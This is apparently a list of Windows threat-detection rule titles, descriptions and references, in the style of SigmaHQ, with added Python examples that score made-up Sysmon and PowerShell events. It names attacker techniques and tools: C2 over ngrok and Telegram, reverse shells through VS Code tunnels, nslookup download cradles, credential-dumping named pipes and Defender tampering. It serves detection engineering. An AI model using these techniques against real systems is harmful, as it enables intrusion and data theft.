Process Initiated Network Connection To Ngrok Domain Detects an executable initiating a network connection to "ngrok" domains. Attackers were seen using "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or an additional download. https://ngrok.com/, https://ngrok.com/blog-post/new-ngrok-domains, https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/, https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf
Communication To Ngrok Tunneling Service Initiated Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or an additional download. https://twitter.com/hakluke/status/1587733971814977537/photo/1, https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent
Potentially Suspicious Network Connection To Notion API Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2" https://github.com/mttaggart/OffensiveNotion, https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332
Network Communication Initiated To Portmap.IO Domain Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors https://portmap.io/, https://github.com/rapid7/metasploit-framework/issues/11337, https://pro.twitter.com/JaromirHorejsi/status/1795001037746761892/photo/2
Suspicious Non-Browser Network Communication With Telegram API Detects a non-browser process interacting with the Telegram API, which could indicate use of a covert C2 https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf
Network Connection Initiated To Visual Studio Code Tunnels Domain Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://cydefops.com/vscode-data-exfiltration
Network Connection Initiated By Eqnedt32.EXE Detects network connections from the Equation Editor process "eqnedt32.exe". https://twitter.com/forensicitguy/status/1513538712986079238, https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/, https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/
Network Connection Initiated By IMEWDBLD.EXE Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download, https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/
Network Connection Initiated Via Notepad.EXE Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network communication except when printing documents for example. https://web.archive.org/web/20200219102749/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf, https://www.cobaltstrike.com/blog/why-is-notepad-exe-connecting-to-the-internet
Office Application Initiated Network Connection To Non-Local IP Detects an office application (Word, Excel, PowerPoint) that initiates a network connection to a non-private IP address. This rule aims to detect traffic similar to that seen exploited in CVE-2021-42292. This rule will require an initial baseline and tuning that is specific to your organization. https://corelight.com/blog/detecting-cve-2021-42292, https://learn.microsoft.com/de-de/microsoft-365/enterprise/urls-and-ip-address-ranges?view=o365-worldwide
Office Application Initiated Network Connection Over Uncommon Ports Detects an office suite application (Word, Excel, PowerPoint, Outlook) communicating with target systems over uncommon ports. https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
Python Initiated Connection Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python, https://pypi.org/project/scapy/
Outbound RDP Connections Over Non-Standard Tools Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. An initial baseline is required before using this utility to exclude third party RDP tooling that you might use. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
RDP Over Reverse SSH Tunnel Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389 https://twitter.com/cyb3rops/status/1096842275437625346
RDP to HTTP or HTTPS Target Ports Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443 https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg, https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling
RegAsm.EXE Initiating Network Connection To Public IP Detects "RegAsm.exe" initiating a network connection to public IP addresses https://app.any.run/tasks/ec207948-4916-47eb-a0f4-4c6abb2e7668/, https://research.splunk.com/endpoint/07921114-6db4-4e2e-ae58-3ea8a52ae93f/, https://lolbas-project.github.io/lolbas/Binaries/Regasm/
Remote Access Tool - AnyDesk Incoming Connection Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows, https://asec.ahnlab.com/en/40263/
Silenttrinity Stager Msbuild Activity Detects possible remote connections to a SILENTTRINITY C2 https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/
Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location Detects a network connection initiated by programs or processes running from suspicious or uncommon file system locations. https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
Network Connection Initiated By Regsvr32.EXE Detects a network connection initiated by "Regsvr32.exe" https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/, https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
Potentially Suspicious Malware Callback Communication Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains. https://twitter.com/M_haggis/status/900741347035889665, https://twitter.com/M_haggis/status/1032799638213066752, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker, https://www.cisa.gov/uscert/ncas/alerts/aa22-321a, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1
Microsoft Sync Center Suspicious Network Connections Detects suspicious connections from Microsoft Sync Center to non-private IPs. https://redcanary.com/blog/intelligence-insights-november-2021/
Rundll32 Internet Connection Detects a rundll32 that communicates with public IP addresses https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100
Uncommon Outbound Kerberos Connection Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation. https://github.com/GhostPack/Rubeus
Potential Remote PowerShell Session Initiated Detects a process that initiated a network connection over ports 5985 or 5986 from a non-network service account. This could potentially indicate a remote PowerShell connection. https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html
Communication To Uncommon Destination Ports Detects programs that connect to uncommon destination ports https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
Outbound Network Connection To Public IP Via Winlogon Detects a "winlogon.exe" process that initiates network communications with public IP addresses https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/
Suspicious Outbound SMTP Connections Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp, https://www.ietf.org/rfc/rfc2821.txt
CobaltStrike Named Pipe Detects the creation of a named pipe as used by CobaltStrike https://twitter.com/d4rksystem/status/1357010969264873472, https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/, https://github.com/SigmaHQ/sigma/issues/253, https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/, https://redcanary.com/threat-detection-report/threats/cobalt-strike/
Suspicious Network Connection Binary No CommandLine Detects suspicious network connections made by a well-known Windows binary run with no command line parameters https://redcanary.com/blog/raspberry-robin/
ADFS Database Named Pipe Connection By Uncommon Tool Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens. https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml, https://o365blog.com/post/adfs/, https://github.com/Azure/SimuLand
Suspicious Wordpad Outbound Connections Detects a network connection initiated by "wordpad.exe" over uncommon destination ports. This might indicate potential process injection activity from a beacon or similar mechanisms. https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
CobaltStrike Named Pipe Pattern Regex Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575, https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752
Outbound Network Connection Initiated By Script Interpreter Detects a script interpreter (wscript/cscript) opening a network connection to a non-local network. Adversaries may use scripts to download malicious payloads. https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md
Potentially Suspicious Wuauclt Network Connection Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule. https://dtm.uk/wuauclt/
Local Network Connection Initiated By Script Interpreter Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder. https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md
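The network-connection rows above share a small amount of logic: resolve the process image to a file name, decide whether the destination is local, and compare source and destination ports. As an added example that is not a Sigma rule and not code from the SigmaHQ project, the Python below applies several of those heuristics to constructed Sysmon Event ID 3 style records. The local network list, the Office port allowlist, the use of source port 3389 as the indicator of the RDP listener inside svchost, and the sample events are all assumptions made for illustration:

```python
import ipaddress
from pathlib import PureWindowsPath

# Added illustration, not a Sigma rule. Sigma rules in this family exclude
# RFC 1918, loopback and link-local destinations explicitly, so the same is
# done here instead of relying on ipaddress.is_private (which also treats
# the documentation ranges used in the sample data as non-global).
LOCAL_NETWORKS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]

# Images named in the rule descriptions above.
OFFICE_NON_LOCAL_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
OFFICE_PORT_IMAGES = OFFICE_NON_LOCAL_IMAGES | {"outlook.exe"}

# Assumed allowlist of ports an Office client normally uses; the rule
# description says a per-organization baseline is required, so tune this.
OFFICE_COMMON_PORTS = {25, 53, 80, 135, 139, 443, 445, 587, 993, 995}

NETWORK_SERVICE = "nt authority\\network service"


def is_local_destination(ip: str) -> bool:
    """True if the destination is in an RFC 1918, loopback or link-local range."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in LOCAL_NETWORKS)


def image_name(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(image).name.lower()


def evaluate(event: dict) -> list[str]:
    """Return the names of the heuristics an initiated connection event matches."""
    hits: list[str] = []
    if not event.get("Initiated", False):
        return hits
    name = image_name(event["Image"])
    dst_ip = event["DestinationIp"]
    dst_port = int(event["DestinationPort"])
    src_port = int(event.get("SourcePort", 0))
    user = event.get("User", "").lower()

    # Office Application Initiated Network Connection To Non-Local IP
    if name in OFFICE_NON_LOCAL_IMAGES and not is_local_destination(dst_ip):
        hits.append("office_app_to_non_local_ip")
    # Office Application Initiated Network Connection Over Uncommon Ports
    if name in OFFICE_PORT_IMAGES and dst_port not in OFFICE_COMMON_PORTS:
        hits.append("office_app_uncommon_port")
    # RDP Over Reverse SSH Tunnel: svchost talking RDP to the loopback address
    if name == "svchost.exe" and ipaddress.ip_address(dst_ip).is_loopback and dst_port == 3389:
        hits.append("rdp_over_reverse_ssh_tunnel")
    # RDP to HTTP or HTTPS Target Ports: assumed indicator is the RDP listener
    # (source port 3389) inside svchost sending to 80 or 443
    if name == "svchost.exe" and src_port == 3389 and dst_port in (80, 443):
        hits.append("rdp_to_http_or_https_port")
    # Potential Remote PowerShell Session: WinRM ports from a non-service account
    if dst_port in (5985, 5986) and user != NETWORK_SERVICE:
        hits.append("potential_remote_powershell_session")
    return hits


# Constructed Sysmon Event ID 3 style records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "User": r"CORP\alice", "DestinationIp": "203.0.113.10",
     "SourcePort": 51234, "DestinationPort": 443, "Initiated": True},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "User": r"CORP\alice", "DestinationIp": "10.0.0.5",
     "SourcePort": 51235, "DestinationPort": 445, "Initiated": True},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "User": r"CORP\alice", "DestinationIp": "198.51.100.7",
     "SourcePort": 51236, "DestinationPort": 8443, "Initiated": True},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "User": r"NT AUTHORITY\NETWORK SERVICE", "DestinationIp": "127.0.0.1",
     "SourcePort": 49700, "DestinationPort": 3389, "Initiated": True},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "User": r"NT AUTHORITY\NETWORK SERVICE", "DestinationIp": "192.0.2.20",
     "SourcePort": 3389, "DestinationPort": 443, "Initiated": True},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "User": r"CORP\bob", "DestinationIp": "10.0.0.9",
     "SourcePort": 52000, "DestinationPort": 5985, "Initiated": True},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "User": r"NT AUTHORITY\NETWORK SERVICE", "DestinationIp": "10.0.0.9",
     "SourcePort": 52001, "DestinationPort": 5985, "Initiated": True},
]


def scan(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Pair each event's image name with the heuristics it triggered."""
    return [(image_name(e["Image"]), evaluate(e)) for e in events]


if __name__ == "__main__":
    for name, hits in scan(SAMPLE_EVENTS):
        print(f"{name:16} {hits or '-'}")
```

The last two sample events show why the account filter matters: the same WinRM port reached from svchost.exe under NETWORK SERVICE is the normal WinRM listener behaviour, while the same port reached by a user's powershell.exe is the remoting client the rule is after.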
CobaltStrike Named Pipe Patterns Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575, https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752
HackTool - CoercedPotato Named Pipe Creation Detects the pattern of a pipe name as used by the hack tool CoercedPotato https://blog.hackvens.fr/articles/CoercedPotato.html, https://github.com/hackvens/CoercedPotato
HackTool - EfsPotato Named Pipe Creation Detects the pattern of a pipe name as used by the hack tool EfsPotato https://twitter.com/SBousseaden/status/1429530155291193354?s=20, https://github.com/zcgonvh/EfsPotato
HackTool - DiagTrackEoP Default Named Pipe Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege. https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22
HackTool - Koh Default Named Pipe Detects creation of default named pipes used by the Koh tool https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12
HackTool - Credential Dumping Tools Named Pipe Created Detects well-known credential dumping tools execution via specific named pipe creation https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799
Alternate PowerShell Hosts Pipe Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html, https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html
New PowerShell Instance Created Detects the execution of PowerShell via the creation of a named pipe starting with PSHost https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html, https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html
PUA - CSExec Default Named Pipe Detects default CSExec pipe creation https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view, https://github.com/malcomvetter/CSExec
PUA - PAExec Default Named Pipe Detects PAExec default named pipe https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md, https://github.com/poweradminllc/PAExec
PUA - RemCom Default Named Pipe Detects default RemCom pipe creation https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view, https://github.com/kavika13/RemCom
WMI Event Consumer Created Named Pipe Detects the WMI Event Consumer service scrcons.exe creating a named pipe https://github.com/RiccardoAncarani/LiquidSnake
Malicious Named Pipe Created Detects the creation of a named pipe seen used by known APTs or malware. https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/, https://securelist.com/faq-the-projectsauron-apt/75533/, https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, https://www.us-cert.gov/ncas/alerts/TA17-117A, https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html, https://thedfirreport.com/2020/06/21/snatch-ransomware/, https://github.com/RiccardoAncarani/LiquidSnake, https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity, https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a, https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf, https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/, https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
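The named-pipe rows above (PSHost pipes, alternate PowerShell hosts, scrcons.exe, PsExec run from a suspicious location) reduce to checks on two Sysmon Event ID 17 fields, Image and PipeName. As an added example that is not a Sigma rule and not SigmaHQ code, the Python below applies those checks to constructed pipe-creation records. The suspicious-directory list and the sample records are assumptions; the \PSHost prefix and the \PSEXESVC pipe name are the well-known defaults of the PowerShell engine and of PsExec's service component:

```python
from pathlib import PureWindowsPath

# Added illustration, not a Sigma rule. Fields follow Sysmon Event ID 17
# (PipeCreated): Image is the creating process, PipeName the pipe path.

# Processes that legitimately host the PowerShell engine; any other image
# creating a \PSHost pipe is an "alternate host".
POWERSHELL_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe"}

# Assumed list of directories treated as suspicious for a PsExec service
# binary; tune per environment.
SUSPICIOUS_DIRS = (
    "\\users\\public\\", "\\temp\\", "\\appdata\\local\\temp\\",
    "\\perflogs\\", "\\programdata\\",
)

PSHOST_PREFIX = "\\pshost"   # PowerShell engine pipes start with \PSHost
PSEXEC_PIPE = "\\psexesvc"   # default PsExec service pipe


def image_name(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(image).name.lower()


def evaluate_pipe(event: dict) -> list[str]:
    """Return the names of the heuristics a pipe-creation event matches."""
    hits: list[str] = []
    image = event["Image"]
    name = image_name(image)
    pipe = event["PipeName"].lower()

    # New PowerShell Instance Created / Alternate PowerShell Hosts Pipe
    if pipe.startswith(PSHOST_PREFIX):
        hits.append("new_powershell_instance")
        if name not in POWERSHELL_HOSTS:
            hits.append("alternate_powershell_host")
    # WMI Event Consumer Created Named Pipe
    if name == "scrcons.exe":
        hits.append("wmi_event_consumer_named_pipe")
    # PsExec Tool Execution From Suspicious Locations - PipeName
    if pipe == PSEXEC_PIPE and any(d in image.lower() for d in SUSPICIOUS_DIRS):
        hits.append("psexec_from_suspicious_location")
    return hits


# Constructed Sysmon Event ID 17 style records (not real telemetry; the
# PSHost suffixes and the scrcons pipe name are made up for the example).
SAMPLE_PIPE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "PipeName": r"\PSHost.133000000000000000.5124.DefaultAppDomain.powershell"},
    {"Image": r"C:\Users\Public\updater.exe",
     "PipeName": r"\PSHost.133000000000000000.6012.DefaultAppDomain.updater"},
    {"Image": r"C:\Windows\System32\wbem\scrcons.exe",
     "PipeName": r"\evtpipe-1"},
    {"Image": r"C:\Windows\PSEXESVC.exe", "PipeName": r"\PSEXESVC"},
    {"Image": r"C:\Users\Public\PSEXESVC.exe", "PipeName": r"\PSEXESVC"},
]


if __name__ == "__main__":
    for event in SAMPLE_PIPE_EVENTS:
        print(f"{image_name(event['Image']):16} {event['PipeName']:60} {evaluate_pipe(event) or '-'}")
```

The second record is the case the "Alternate PowerShell Hosts" rows describe: the engine pipe is created, so PowerShell is running, but the creating image is not powershell.exe, so process-name based detections would miss it.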
Nslookup PowerShell Download Cradle Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records. https://twitter.com/Alh4zr3d/status/1566489367232651264
PsExec Tool Execution From Suspicious Locations - PipeName Detects PsExec default pipe creation where the image executed is located in a suspicious location, which could indicate that the tool is being used in an attack https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet
Delete Volume Shadow Copies Via WMI With PowerShell Detects deletion of volume shadow copies using operating system utilities via PowerShell https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md, https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods
PowerShell Downgrade Attack - PowerShell Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
PowerShell Called from an Executable Version Mismatch Detects PowerShell called from an executable by the version mismatch method https://adsecurity.org/?p=2921
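Both rows above rely on the HostVersion and EngineVersion fields that PowerShell writes into Event ID 400 (Engine state changed) in the Windows PowerShell log. As an added example that is not a Sigma rule and not SigmaHQ code, the Python below parses the message text of that event and applies the two comparisons: an engine version of 2.0 under a newer host is the downgrade case, and any other host/engine disagreement is the version-mismatch case. The three event messages are constructed and abbreviated; the field names are the ones PowerShell itself emits:

```python
import re

# Added illustration, not a Sigma rule. Parses the "Details" block of a
# Windows PowerShell Event ID 400 message into the fields used by the two
# heuristics above.
FIELD_RE = re.compile(
    r"^\s*(HostName|HostVersion|HostApplication|EngineVersion)=(.*?)\s*$",
    re.MULTILINE,
)


def parse_engine_event(message: str) -> dict[str, str]:
    """Extract HostName/HostVersion/HostApplication/EngineVersion from an Event 400 body."""
    return dict(FIELD_RE.findall(message))


def classify(message: str) -> list[str]:
    """Return which heuristic (if any) the engine-state event matches."""
    fields = parse_engine_event(message)
    host = fields.get("HostVersion", "")
    engine = fields.get("EngineVersion", "")
    hits: list[str] = []
    # PowerShell Downgrade Attack: the 2.0 engine started by a newer host
    # (e.g. "powershell.exe -Version 2"); the old engine has no script block
    # logging and no AMSI integration, which is why attackers ask for it.
    if engine.startswith("2.0") and not host.startswith("2.0"):
        hits.append("powershell_downgrade_attack")
    # PowerShell Called from an Executable Version Mismatch: a custom host
    # (an executable embedding System.Management.Automation) reports its own
    # HostVersion, which does not equal the version of the engine it loaded.
    elif host and engine and host != engine:
        hits.append("powershell_host_engine_version_mismatch")
    return hits


# Constructed, abbreviated Event ID 400 messages (not real log exports).
EVENT_NORMAL = """Engine state is changed from None to Available.

Details:
\tNewEngineState=Available
\tPreviousEngineState=None

\tHostName=ConsoleHost
\tHostVersion=5.1.19041.1
\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
\tEngineVersion=5.1.19041.1
"""

EVENT_DOWNGRADE = """Engine state is changed from None to Available.

Details:
\tNewEngineState=Available
\tPreviousEngineState=None

\tHostName=ConsoleHost
\tHostVersion=5.1.19041.1
\tHostApplication=powershell.exe -Version 2 -NoProfile -Command Get-Date
\tEngineVersion=2.0
"""

EVENT_CUSTOM_HOST = """Engine state is changed from None to Available.

Details:
\tNewEngineState=Available
\tPreviousEngineState=None

\tHostName=runner.exe
\tHostVersion=1.0.0.0
\tHostApplication=C:\\Users\\Public\\runner.exe
\tEngineVersion=5.1.19041.1
"""


if __name__ == "__main__":
    for label, msg in (("normal", EVENT_NORMAL), ("downgrade", EVENT_DOWNGRADE),
                       ("custom host", EVENT_CUSTOM_HOST)):
        app = parse_engine_event(msg).get("HostApplication", "")
        print(f"{label:12} {app!r} -> {classify(msg) or '-'}")
```

Because the comparison is between two fields of the same event, it is resistant to the renaming tricks that defeat process-name rules elsewhere in this list: whatever the host binary is called, the engine it loads still reports its own version.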
Netcat The Powershell Version Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network https://nmap.org/ncat/, https://github.com/besimorhino/powercat, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md
Potential RemoteFXvGPUDisablement.EXE Abuse Detects PowerShell module creation where the module contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary, which is known to be vulnerable to module load-order hijacking. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
Remote PowerShell Session (PS Classic) Detects remote PowerShell sessions https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html
Renamed Powershell Under Powershell Channel Detects a renamed Powershell execution, which is a common technique used to circumvent security controls and bypass detection logic that's dependent on process names and process paths. https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Suspicious PowerShell Download Detects suspicious PowerShell download command https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html
Use Get-NetTCPConnection Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell
Zip A Folder With PowerShell For Staging In Temp - PowerShell Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a
Tamper Windows Defender - PSClassic Detects attempts to disable scheduled scanning and other parts of Windows Defender ATP, or to set default actions to allow. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
Suspicious Non PowerShell WSMAN COM Provider Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application. https://twitter.com/chadtilbury/status/1275851297770610688, https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/, https://github.com/bohops/WSMan-WinRM
Potential Active Directory Enumeration Using AD Module - PsModule Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dll" DLL, which is often used by attackers to perform AD enumeration. https://github.com/samratashok/ADModule, https://twitter.com/cyb3rops/status/1617108657166061568?s=20, https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges
Alternate PowerShell Hosts - PowerShell Module Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html
Bad Opsec Powershell Code Artifacts Focuses on trivial artifacts observed in variants of prevalent offensive PS1 payloads, including Cobalt Strike Beacon, PoshC2, PowerView, Letmein, Empire, PowerSploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec. https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/, https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/, https://www.mdeditor.tw/pl/pgRt
